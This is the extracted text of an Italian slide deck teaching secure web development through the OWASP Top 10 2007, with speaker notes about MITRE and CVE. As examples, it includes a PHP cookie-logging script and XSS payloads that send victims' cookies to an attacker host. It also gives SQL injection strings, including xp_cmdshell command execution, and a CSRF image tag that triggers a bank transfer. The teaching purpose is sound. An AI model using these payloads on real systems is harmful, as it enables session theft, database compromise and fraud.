Recomendados
Recomendados
Más contenido relacionado
La actualidad más candente
La actualidad más candente (7)
Similar a Owasp parte3
Similar a Owasp parte3 (20)
Owasp parte3
- 1. Sviluppo sicuro di Applicazioni WEB (Parte 3)
- 2. Last….. TOP 10 Vulnerabilities
- 3. Cos ’ è OWASP Top 10 2007 OWASP Top 10 2007 è un progetto basato sulla classificazione delle 10 vulnerabilità maggiormente critiche estratte dal MITRE (MITRE Corporation not-for-profit organization) Vulnerability Trends 2006, nell ’ ambito delle Web Application. L ’ obiettivo principale è quello di sensibilizzare il mondo dell ’ IT (e non solo) sulle conseguenze che queste vulnerabilità possono avere sul business aziendale, sulla propria privacy e su quella degli altri.
- 4. Statistiche IBM
- 5. Statistiche IBM
- 6. Statistiche IBM
- 7. Cos ’ è OWASP Top 10 2007 Distribuzione delle tipologie di attacchi
- 8. Cos ’ è OWASP Top 10 2007 A1 - Cross Site Scripting (XSS) A2 - Injection Flaws A3 - Malicious File Execution A4 - Insecure Direct Object Reference A5 - Cross Site Request Forgery (CSRF) A6 - Information Leakage / Improper Error Handling A7 - Broken Authentication and Session Management A8 - Insecure Cryptographic Storage A9 - Insecure Communications A10 - Failure to Restrict URL Access
- 9. Top 10 2007 in dettaglio 1/10 Cross Site Scripting (XSS) Una vulnerabilità Cross Site Scripting (XSS) si verifica quando un ’ applicazione riceve dati forniti dall ’ utente senza effettuare alcun tipo di validazione del contenuto; nel restituire tali dati all'utente essi vengono interpretati dal browser consentendo l ’ esecuzione di codice malevolo lato client.
- 11. Top 10 2007 in dettaglio 1/10
- 12. Top 10 2007 in dettaglio 1/10 <?php $filename = "cookie.txt"; if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, 'a')) { echo "Errore: impossibile scrivere il file"; exit; } else { if (fwrite($handle, "" . $_GET["cookie"]) === FALSE) { echo "Errore durante la scrittura"; exit; } } echo "Scrittura effettuata con successo =D"; fclose($handle); exit; } echo "Niente da scrivere"; exit; ?> //PS. mi scuso con l'autore dello script se non cito la fonte ma non ricordo proprio dove l'ho preso :S Immaginate che l ’ attaccante inietti in un forum qualcosa del tipo: Ciao <script>document.location= www.nostrosito.com/log.php?cookie='+escape(document.cookie) </script> La vittima visita la pagina si creerebbe www.nostrosito.com/cookie.txt contenente i cookie della nostra vittima del sito da cui sfruttiamo l'xss.</script> Considerate qualcosa del tipo:
- 13. Top 10 2007 in dettaglio 1/10 <a href= “ http://www.my-banca.it/welcome.cgi?name=<script>window.open ( “ http://www.attacker. site/collect.cgi?cookie= ” %2Bdocument.cookie)</script> ” > Ciao </a> Malicious Link: pensate di inviare alla vittima una mail - magari mascherata come informativa della banca - con un link del tipo: La risposta del server sarà: <HTML> <Title>Welcome!</Title> Hi <script> window.open( “ http://www.attacker.site/collect.cgi?cookie= ” +do cument.cookie)</script> <BR>Welcome to our system </HTML> Notare la pericolosità: la vittima si collega al sito della sua banca………..
- 16. C Esempio di Cross Site Scripting Top 10 2007 in dettaglio 1/10
- 17. Injection Flaws Le Injection Flaws sono vulnerabilità relative all ’ invio, da parte di un agente di minaccia, di input non validato, ad un interprete come comandi di sistema o query SQL. Top 10 2007 in dettaglio 2/10
- 19. SQL Injection – Analisi Tabelle Username = ' having1=1 -- Password = pippo Select userName from users where userName= ‘’ HAVING 1=1 -- Nel caso specifico la keyword having genera un errore avente al suo interno il nome della colonna. Error Type: Microsoft OLE DB ProviderforSQL Server (0x80040E14) Column'users.userName' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /securityloginrespond.asp, line 24 Top 10 2007 in dettaglio 2/10
- 20. SQL Injection – Analisi colonne Username = ' UNION SELECT * FROM users GROUP BY userName-- Password = pippo Select userName from users where userName= ‘ ' UNION SELECT * FROM users GROUP BY userName– Utilizzando la keyword groupby è invece possibile ricavare i nomi dei campi della tabella. Error Type: Microsoft OLE DB Provider for SQL Server (0x80040E14) Column'users.userId' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /securityloginrespond.asp, line 24 Top 10 2007 in dettaglio 2/10
- 21. SQL Injection – Inserimento Dati Username = '; insert into users (userName, userPass) VALUES ( ‘ test', ‘ test') -- Password = pippo Select userName from users where userName= ‘ '; insert into users (userName, userPass) VALUES ( ‘ test', ‘ test') -- Top 10 2007 in dettaglio 2/10
- 22. SQL Injection – Utilizzo di Macro Username = ' union select @@version – Password = pippo Select userName from users where userName= ‘ ' union select @@version – Logged In As Microsoft SQL Server 2000 -8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build2195: Service Pack 4) ' or 1 in (SELECT @@servername FROM users) -- Microsoft OLE DB Provider for SQL Server (0x80040E07) Syntax error converting the nvarchar valu e'SERVER2000' to a column of data type int. Top 10 2007 in dettaglio 2/10
- 23. SQL Injection – Esecuzione di Comandi Username: ' execmaster..xp-cmdshell 'dir > c:netpubwwrootlah.txt'-- Password: pippo Select userName from users where userName= ‘ ' execmaster..xp-cmdshell 'dir > c:netpubwwrootlah.txt ’ -- Possibilità di eseguire comandi solo nel caso in cui l ’ utente utilizzato per l ’ accesso al database sia sa. Top 10 2007 in dettaglio 2/10
- 24. SQL Injection – Esempio Top 10 2007 in dettaglio 2/10
- 27. Esempio di SQL Injection Top 10 2007 in dettaglio 2/10
- 31. Esempio di Malicius File Execution Top 10 2007 in dettaglio 3/10
- 32. Insecure Direct Object Reference Un ’ Insecure Direct Object Reference si verifica quando nell ’ applicazione sono presenti elementi liberamente manipolabili (file, directory, record database) che consentono di risalire ad ulteriori informazioni che possono portare ad un ’ escalation di privilegi o all ’ acquisizione di dati critici. Top 10 2007 in dettaglio 4/10
- 36. Esempio di Insecure Direct Object Reference Top 10 2007 in dettaglio 4/10
- 37. Cross Site Request Forgery (CSRF) Un attacco di tipo Cross Site Request Forgery è mirato a forzare il Browser di una vittima ad eseguire operazioni da lui non espressamente richieste sfruttando vulnerabilità applicative come una non corretta implementazione delle sessioni ed un passaggio dei parametri e dei rispettivi valori di una richiesta attraverso l ’ uso del metodo GET. Nota la differenza con XSS: nel csrf è la vittima che viene forzata a compiere un ’ azione, con xss è l ’ attaccante che si impadronisce dell ’ identità della vittima e richiede javascript. Inoltre: xss richiede che un sito accetti malicious code, mentre con CSRF il codice malevole è in un sito di terze parte. Top 10 2007 in dettaglio 5/10
- 39. Anatomia di un attacco Cross Site Request Forgery (CSRF) 1/3 Top 10 2007 in dettaglio 5/10
- 40. Anatomia di un attacco Cross Site Request Forgery (CSRF) 2/3 Top 10 2007 in dettaglio 5/10
- 41. Anatomia di un attacco Cross Site Request Forgery (CSRF) 3/3 Top 10 2007 in dettaglio 5/10
- 42. Supponiamo che l'utente Alice stia navigando su un forum, o un blog, o stia visualizzando una mail in formato HTML dove l'utente Bob ha postato un'immagine malevola così forgiata: <img src="http://bancadialice.com/prelievo.php?da=conto_alice&a=conto_bob" alt="Errore nella visualizzazione dell'immagine ” > Top 10 2007 in dettaglio 5/10 Supponiamo ora che Alice sia autenticata in quel momento sul sito della sua banca, quindi sul suo computer sia presente un cookie che testimonia l'avvenuta autenticazione. In tal caso, la richiesta effettuata sarà perfettamente valida, e l'URL in questione eseguito da Alice con ovvie conseguenze. In genere questo tipo di attacchi vengono perpetrati attraverso immagini o iframe "abusivi" nel codice. X
- 47. Esempio di Cross Site Request Forgery (CSRF) Top 10 2007 in dettaglio 5/10
- 48. Information Leakage and Improper Error Handling Information Leakage e Improper Error Handling si verificano spesso in presenza di Web Application non correttamente sviluppate che consentono l ’ acquisizione d ’ informazioni utilizzabili in un secondo momento da un agente di minaccia per effettuare un attacco mirato all ’ applicazione o al sistema server. Top 10 2007 in dettaglio 6/10
- 50. Information Leakage and Improper Error Handling Top 10 2007 in dettaglio 6/10
- 53. Esempio di Information Leakage e Improper Error Hendling Top 10 2007 in dettaglio 6/10
- 54. Broken Authentication and Session Management Broken Authentication e Session Management sono vulnerabilità riconducibili ad un ’ errata implementazione della gestione delle credenziali di accesso e/o delle chiavi di sessioni che rendono possibili accessi non autorizzati all ’ applicazione tramite l ’ impersonificazione di altre identità vittima. URL Rewriting Top 10 2007 in dettaglio 7/10
- 56. Broken Authentication and Session Management Top 10 2007 in dettaglio 7/10
- 59. Esempio di Broken Authentication and Session Management Top 10 2007 in dettaglio 7/10
- 60. Insecure Cryptographic Storage L ’ Insecure Cryptographic Storage è una vulnerabilità causata dalla non corretta conservazione dei dati e dall ’ errata implementazione delle funzioni applicative create allo scopo di proteggere tali informazioni. Top 10 2007 in dettaglio 8/10
- 62. Insecure Cryptographic Storage Top 10 2007 in dettaglio 8/10
- 65. Esempio di Insecure Cryptographic Storage Top 10 2007 in dettaglio 8/10
- 66. Insecure Communications Le Insecure Communications consentono ad un agente di minaccia di intercettare informazioni come credenziali di accesso e informazioni riservate in transito su canali privi di cifratura (plaintext). Top 10 2007 in dettaglio 9/10
- 69. Esempio di Insecure Communications Top 10 2007 in dettaglio 9/10
- 70. Failure to Restrict URL Access Si verifica quando per proteggere aree di una web application non visibili ad utenti non autorizzati si fa affidamento esclusivamente ad un approccio di tipo “ security by obscurity ” poiché si tende a pensare che ciò che non è direttamente visibile non possa essere in alcun modo raggiunto e sfruttato da un agente di minaccia. Top 10 2007 in dettaglio 10/10
- 72. Failure to Restrict URL Access Top 10 2007 in dettaglio 10/10
- 75. Esempio di Failure to Restrict URL Access Top 10 2007 in dettaglio 10/10
- 76. Domande? Grazie per l ’ attenzione Claudio Di Giovanni [email_address]
Notas del editor
- About MITRE The MITRE Corporation is a not-for-profit organization chartered to work in the public interest. As a national resource, we apply our expertise in systems engineering, information technology, operational concepts, and enterprise modernization to address our sponsors' critical needs. MITRE manages three Federally Funded Research and Development Centers (FFRDCs): one for the Department of Defense (known as the DoD Command, Control, Communications and Intelligence FFRDC), one for the Federal Aviation Administration (the Center for Advanced Aviation System Development), and one for the Internal Revenue Service (the Center for Enterprise Modernization). MITRE also has its own independent research and development program that explores new technologies and new uses of technologies to solve our sponsors' problems in the near-term and in the future. Our History http://cve.mitre.org/ CVE® International in scope and free for public use, CVE is a dictionary of publicly known information security vulnerabilities and exposures.CVE's common identifiers enable data exchange between security products and provide a baseline index point for evaluating coverage of tools and services. Cos ’ è la CVE ? Il progetto Common Vulnerabilities and Exposures (CVE) intende sviluppare una standardizzazione delle denominazioni di tutte le vulnerabilità pubblicamente note e oggi è uno tra i più affidabili e aggiornati sistemi di classificazione delle vulnerabilità. Lo scopo di questa iniziativa è semplificare la ricerca di informazioi attraverso i vari database di vulnerabilità tramite l'utilizzo di codici identificativi standardizzati. Il database di Scan-edge integra lo standard CVE nei risultati della scansione e nelle funzioni di ricerca per parola chiave, per denominazione CVE o candidate (CAN). Come fa una segnalazione a diventare CVE? Il percorso ha inizio con la scoperta di una possibile nuova vulnerabilità. Il CNA (Candidate Numbering Authority) assegna alla vulnerabilità un identificativo CAN (CAN XXXX-YYY) e lo sottopone all'esame dell'Editorial Board, che discute il candidato e tramite votazione accetta, rifiuta o posticipa il suo ingresso nella lista e il suo riconoscimento come vulnerabilità CVE. È possibile che un CAN non passi mai a CVE. In ogni caso qualsiasi decisione in merito deliberata dall'Editorial Board è pubblica e consultabile dal sito CVE. Cosa implica la Dichiarazione di Compatibilità CVE? Dichiararsi CVE Compatibili vuol dire essere in grado di assicurare prima di tutto l'appoggio e la propria collaborazione ad un progetto a livello mondiale; vuol dire poter attingere , e allo stesso tempo contribuire , ad un database costantemente aggiornato e a cui partecipano istituzioni legate al mondo della sicurezza , tra cui società vendor di prodotti di sicurezza, università e centri di ricerca, organi di governo ed esperti del settore. Per l'utente è la possibilità di effettuare ricerche dirette delle vulnerabilità classificate CVE /CAN , e la certezza di trovare il riferimento corrispondente CVE per ogni segnalazione. Perchè la CVE? Standardizzare i codici di riconoscimento delle varie vulnerabilità facilita notevolmente agli utenti la ricerca attraverso database differenti , che come tali usano codici diversi anche per identificare la medesima vulnerabilità. CVE raggruppa tutte le vulnerabilità segnalate dai vari enti preposti e assegna ad ognuna un identificativo CVE . Da questo identificativo è poi semplice risalire alla descrizione e alle soluzioni indicate nei diversi database che interagiscono con quello CVE . CVE consente il dialogo e l'interazione , lo scambio reciproco di informazioni tra differenti database, così da fornire dati sempre più numerosi e attendibili agli utenti. I database dei tool CVE Compatibili offrono una migliore copertura, una diretta operabilità e una maggiore sicurezza. La MITRE Corporation sostiene il progetto CVE e modera le discussioni dell' Editorial Board . CVE è disponibile al pubblico? E dove posso trovare l'ultima versione CVE? CVE è gratutio e disponibile per chiunque sia interessato a confrontare le informazioni messe a disposizione dai vari tools. È possibile RICERCARE le vulnerabilità CVE , SCARICARE la lista completa, copiarla, distribuirla ecc. Di chi è l'iniziativa CVE? Il progetto CVE è il risultato di un'idea del CVE Editorial Board, che comprende le più rappresentative tra le numerose organizzazioni che si occupano di sicurezza informatica, tra cui security vendors, isitituzioni accademiche e governative ed esperti di sicurezza informatica. CVE è un vulnerability database? CVE non è un database di vulnerabilità. CVE è concepito per consentire ai vari database di dialogare tra loro e agli utenti il confronto tra i vari security tools. Per questo CVE non contiene informazioni tecniche dettagliate, che sono già reperibili nei vari database. CVE fornisce un codice standard, una breve descrizione e rimanda alla relativa documentazione. Che vantaggi offre la CVE? CVE offre un codice identificativo standard per ogni vulnerabilità segnalata. Avere a disposizione questo identificativo permette l'accesso rapido e diretto ai dati delle molte fonti di informazioni che hanno aderito all'iniziativa CVE. Cosa vuol dire essere CVE Compatibile? Un Tool è CVE Compatibile se utilizza lo standard CVE consentendo il rimando incrociato ad altri tools che utilizzano la stessa denominazione. Essere CVE Compatibili vuol dire prima di tutto rispondere ad alcuni fondamentali requisiti: CVE SEARCH: la possibilità per gli utenti di effettuare ricerche di vulnerabilità inserendo l'identificativo CVE. CVE OUTPUT: ogni informazione fornita all'utente deve contenere l'esatto riferimento CVE. CVE ACCURACY: conferma l'impegno del fonitore nell'assicurare che le CVE siano correttamente utilizzate (esattezza dei link e dei riferimenti). Come posso ottenere una copia delle CVE? La lista completa CVE è del tutto gratuita e scaricabile dal sito CVE. La lista è disponibile in diversi formati (Html, text, csv). È anche possibile utilizzare la lista CVE per effettuare ricerche di vulnerabilità specifiche, o semplicemente visualizzare l'elenco, sempre a disposizione sul sito.
- About MITRE The MITRE Corporation is a not-for-profit organization chartered to work in the public interest. As a national resource, we apply our expertise in systems engineering, information technology, operational concepts, and enterprise modernization to address our sponsors' critical needs. MITRE manages three Federally Funded Research and Development Centers (FFRDCs): one for the Department of Defense (known as the DoD Command, Control, Communications and Intelligence FFRDC), one for the Federal Aviation Administration (the Center for Advanced Aviation System Development), and one for the Internal Revenue Service (the Center for Enterprise Modernization). MITRE also has its own independent research and development program that explores new technologies and new uses of technologies to solve our sponsors' problems in the near-term and in the future. Our History http://cve.mitre.org/ CVE® International in scope and free for public use, CVE is a dictionary of publicly known information security vulnerabilities and exposures.CVE's common identifiers enable data exchange between security products and provide a baseline index point for evaluating coverage of tools and services. Cos ’ è la CVE ? Il progetto Common Vulnerabilities and Exposures (CVE) intende sviluppare una standardizzazione delle denominazioni di tutte le vulnerabilità pubblicamente note e oggi è uno tra i più affidabili e aggiornati sistemi di classificazione delle vulnerabilità. Lo scopo di questa iniziativa è semplificare la ricerca di informazioi attraverso i vari database di vulnerabilità tramite l'utilizzo di codici identificativi standardizzati. Il database di Scan-edge integra lo standard CVE nei risultati della scansione e nelle funzioni di ricerca per parola chiave, per denominazione CVE o candidate (CAN). Come fa una segnalazione a diventare CVE? Il percorso ha inizio con la scoperta di una possibile nuova vulnerabilità. Il CNA (Candidate Numbering Authority) assegna alla vulnerabilità un identificativo CAN (CAN XXXX-YYY) e lo sottopone all'esame dell'Editorial Board, che discute il candidato e tramite votazione accetta, rifiuta o posticipa il suo ingresso nella lista e il suo riconoscimento come vulnerabilità CVE. È possibile che un CAN non passi mai a CVE. In ogni caso qualsiasi decisione in merito deliberata dall'Editorial Board è pubblica e consultabile dal sito CVE. Cosa implica la Dichiarazione di Compatibilità CVE? Dichiararsi CVE Compatibili vuol dire essere in grado di assicurare prima di tutto l'appoggio e la propria collaborazione ad un progetto a livello mondiale; vuol dire poter attingere , e allo stesso tempo contribuire , ad un database costantemente aggiornato e a cui partecipano istituzioni legate al mondo della sicurezza , tra cui società vendor di prodotti di sicurezza, università e centri di ricerca, organi di governo ed esperti del settore. Per l'utente è la possibilità di effettuare ricerche dirette delle vulnerabilità classificate CVE /CAN , e la certezza di trovare il riferimento corrispondente CVE per ogni segnalazione. Perchè la CVE? Standardizzare i codici di riconoscimento delle varie vulnerabilità facilita notevolmente agli utenti la ricerca attraverso database differenti , che come tali usano codici diversi anche per identificare la medesima vulnerabilità. CVE raggruppa tutte le vulnerabilità segnalate dai vari enti preposti e assegna ad ognuna un identificativo CVE . Da questo identificativo è poi semplice risalire alla descrizione e alle soluzioni indicate nei diversi database che interagiscono con quello CVE . CVE consente il dialogo e l'interazione , lo scambio reciproco di informazioni tra differenti database, così da fornire dati sempre più numerosi e attendibili agli utenti. I database dei tool CVE Compatibili offrono una migliore copertura, una diretta operabilità e una maggiore sicurezza. La MITRE Corporation sostiene il progetto CVE e modera le discussioni dell' Editorial Board . CVE è disponibile al pubblico? E dove posso trovare l'ultima versione CVE? CVE è gratutio e disponibile per chiunque sia interessato a confrontare le informazioni messe a disposizione dai vari tools. È possibile RICERCARE le vulnerabilità CVE , SCARICARE la lista completa, copiarla, distribuirla ecc. Di chi è l'iniziativa CVE? Il progetto CVE è il risultato di un'idea del CVE Editorial Board, che comprende le più rappresentative tra le numerose organizzazioni che si occupano di sicurezza informatica, tra cui security vendors, isitituzioni accademiche e governative ed esperti di sicurezza informatica. CVE è un vulnerability database? CVE non è un database di vulnerabilità. CVE è concepito per consentire ai vari database di dialogare tra loro e agli utenti il confronto tra i vari security tools. Per questo CVE non contiene informazioni tecniche dettagliate, che sono già reperibili nei vari database. CVE fornisce un codice standard, una breve descrizione e rimanda alla relativa documentazione. Che vantaggi offre la CVE? CVE offre un codice identificativo standard per ogni vulnerabilità segnalata. Avere a disposizione questo identificativo permette l'accesso rapido e diretto ai dati delle molte fonti di informazioni che hanno aderito all'iniziativa CVE. Cosa vuol dire essere CVE Compatibile? Un Tool è CVE Compatibile se utilizza lo standard CVE consentendo il rimando incrociato ad altri tools che utilizzano la stessa denominazione. Essere CVE Compatibili vuol dire prima di tutto rispondere ad alcuni fondamentali requisiti: CVE SEARCH: la possibilità per gli utenti di effettuare ricerche di vulnerabilità inserendo l'identificativo CVE. CVE OUTPUT: ogni informazione fornita all'utente deve contenere l'esatto riferimento CVE. CVE ACCURACY: conferma l'impegno del fonitore nell'assicurare che le CVE siano correttamente utilizzate (esattezza dei link e dei riferimenti). Come posso ottenere una copia delle CVE? La lista completa CVE è del tutto gratuita e scaricabile dal sito CVE. La lista è disponibile in diversi formati (Html, text, csv). È anche possibile utilizzare la lista CVE per effettuare ricerche di vulnerabilità specifiche, o semplicemente visualizzare l'elenco, sempre a disposizione sul sito.
- Washington Post, NSA, ...
- Unicode è un sistema di codifica che assegna un numero univoco ad ogni carattere usato per la scrittura di testi, in maniera indipendente dalla lingua , dalla piattaforma informatica e dal programma utilizzati. Unicode è stato compilato e viene aggiornato e pubblicizzato dal Unicode Consortium [1] , un consorzio internazionale di aziende interessate alla interoperabilità nel trattamento informatico dei testi in lingue diverse. UTF-8 ( U nicode T ransformation F ormat, 8 bit) è una codifica dei caratteri Unicode in sequenze di lunghezza variabile di byte, creata da Rob Pike e Ken Thompson . UTF-8 usa gruppi di byte per rappresentare i caratteri Unicode , ed è particolarmente utile per il trasferimento tramite sistemi di posta elettronica a 8- bit . UTF-8 usa da 1 a 4 byte per rappresentare un carattere Unicode. Per esempio un solo byte è necessario per rappresentare i 128 caratteri dell'alfabeto ASCII , corrispondenti alle posizioni Unicode da U+0000 a U+007F.
- (Hibernate-commercial) Object-relational mapping (aka ORM , O/RM , and O/R mapping ) is a programming technique for converting data between incompatible type systems in relational databases and object-oriented programming languages. This creates, in effect, a &quot;virtual object database &quot; which can be used from within the programming language. There are both free and commercial packages available that perform object-relational mapping, although some programmers opt to create their own ORM tools
- Problema: Gli hackers possono eseguire da remoto codice arbitrario, installare rootkit, o compromettere completamente un sistema. Qualsiasi tipo di applicazione web che accetta file o nomi di file dall'utente è vulnerabile. Questo genere di vulnerabilità è nota con PHP, il linguaggio di scripting più utilizzato per lo sviluppo delle web application.
- Problema: Gli attacchi manipolano i riferimenti diretti agli oggetti per ottenere un accesso non autorizzato ad altri oggetti. Questo accade quando gli URL o i parametri di un form contengono riferimenti ad oggetti come file, directory, record di database, o chiavi.
- La truffa legata alle donazioni per le popolazioni colpite dallo Tsunami continua e nelle ultime ore si arricchisce di un nuovo espediente: la conquista di una posizione di vertice nel ranking Google per ottenere in modo fraudolento soldi destinati alla beneficienza. Il misfatto è relativo al sito internet della China Charity Federation , l'organo preposto ad organizzare, gestire ed inviare i fondi raccolti per aiutare le popolazioni bisognose. Il sito è raggiungibile all'indirizzo www.chinacharity.cn, ma si segnala la registrazione di un altro sito con url molto simile e finalità ben diversa: www.chinacharity.cn.net. Quest'ultimo tenta di defraudare agli utenti le somme destinate alla beneficienza falsificando l'accesso al sito ufficiale dell'associazione e convogliando gli introiti verso gli anonimi responsabili dell'azione truffaldina. Per rendere il tutto maggiormente credibile, inoltre, il sito-truffa è stato fatto oggetto di un'azione definita Google bombing e destinata a far crescere il sito nel ranking di Google: così facendo il sito falso ha superato nei risultati delle ricerche il sito ufficiale garantendosi la sicurezza degli utenti pronti alle donazioni. Il Google bombing ha preso forma linkando www.chinacharity.cn.net tramite le parole &quot;The China Charity Federation&quot;: così facendo il risultato della query è stato abilmente manipolato e la fiducia che gli utenti hanno riposto nel ranking è stata raggirata. Nel momento in cui il presente articolo viene pubblicato il ranking Google conferma quanto emerso, e la query &quot;The China Charity Federation&quot; restituisce ancora in prima posizione il sito fraudolento. L'url non risulta più essere, però, raggiungibile . Il misfatto va a sommarsi ad altri casi di virus e spam sorti (triste analogia) sull'onda mediatica sollevata dallo tsunami di S.Stefano.
- Problema: “ Semplice e devastante ” , questo attacco prende il controllo del browser della vittima quando è loggato su un sito web, ed invia delle richieste malevoli alla web application. I siti web sono estremamente vulnerabili, principalmente perchè tendono ad autorizzare le richieste in base al cookie di sessione o alla funzionalità “ ricorda la password ” . Le banche in particolare rappresentano dei potenziali target. This vulnerability is extremely widespread, as any web application that Has no authorization checks for vulnerable actions Will process an action if a default login is able to be given in the request (e.g. http://www.example.com/admin/doSomething.ctl?username=admin&passwd=admin) Authorizes requests based only on credentials that are automatically submitted such as the session cookie if currently logged into the application, or “ Remember me ” functionality if not logged into the application, or a Kerberos token if part of an Intranet participating in integrated logon with Active Directory “ Il 99 per cento delle applicazioni sono vulnerabili a questo tipo di attacchi. C'è stato un exploit reale che ha causato a qualcuno delle perdite di denaro? Probabilmente le banche non ne sono neanche a conoscenza. Per la banca ogni richiesta risulta essere una transazione legittima eseguite da un utente loggato ”
- Problema: I messaggi di errore che le applicazioni generano e visualizzano agli utenti spesso sono utili agli hackers per violare la privacy o per conoscere la configurazione del programma e le sue caratteristiche interne.
- Wikipedia: A stack trace (also called stack backtrace or stack traceback ) is a report of the active stack frames instantiated by the execution of a program. Although stack traces may be generated anywhere within a program, they are mostly used to aid debugging by showing where exactly an error occurs. The last few stack frames often indicate the origin of the bug.
- Problema: E' possibile ottenere il controllo degli account utente/amministrativi quando le applicazioni non proteggono adeguatamente dall' inizio alla fine le credenziali e le variabili di sessione. Ciò porta a violazioni della privacy e compromette i controlli sulle autorizzazioni e le responsabilità. “ Le cause principali nel meccanismo di autenticazione non sono rare, ma le vulnerabilità sono sempre più spesso introdotte attraverso funzionalità accessorie come il logout, la gestione delle password, il timeout, la funzione “ ricorda la password ” , la domanda segreta, e l'aggiornamento degli account ” .
- Problema: Molti sviluppatori web non salvano in forma criptata i dati sensibili, malgrado la crittografia debba essere un elemento chiave delle maggior parte delle web application. Anche quando viene utilizzata la crittografia, spesso questa non viene progettata adeguatamente, utilizzando delle cifrature inadeguate. Come riportato da OWASP: “ Queste falle possono portare alla divulgazione di dati sensibili e alla violazione di conformità ” .
- Problema: Simile alla precedente vulnerabilità (Insecure Criptographic Storage), questo caso riguarda il mancato utilizzo della crittografia del traffico di rete nei casi in cui è necessario proteggere le comunicazioni sensibili. Gli attaccanti possono accedere a conversazioni non protette, incluse la trasmissione delle credenziali e le informazioni riservate. Per questa ragione, gli standard PCI richiedono che le informazione relative alle carte di credito vengano criptate quando sono trasmesse sulla Rete.
- Utilizzare un protocollo di crittografia a livello di trasporto per proteggere le comunicazioni tra le parti dell ’ infrastruttura, come web server e il DBMS.
- Problema: Alcune pagine web dovrebbero essere ristrette ad una piccola cerchia di utenti privilegiati, come gli amministratori. Molto spesso non c'è una protezione reale per queste pagine, il cui URL solitamente comprende un numero ID che può essere facilmente trovato mediante tecniche di brute forcing.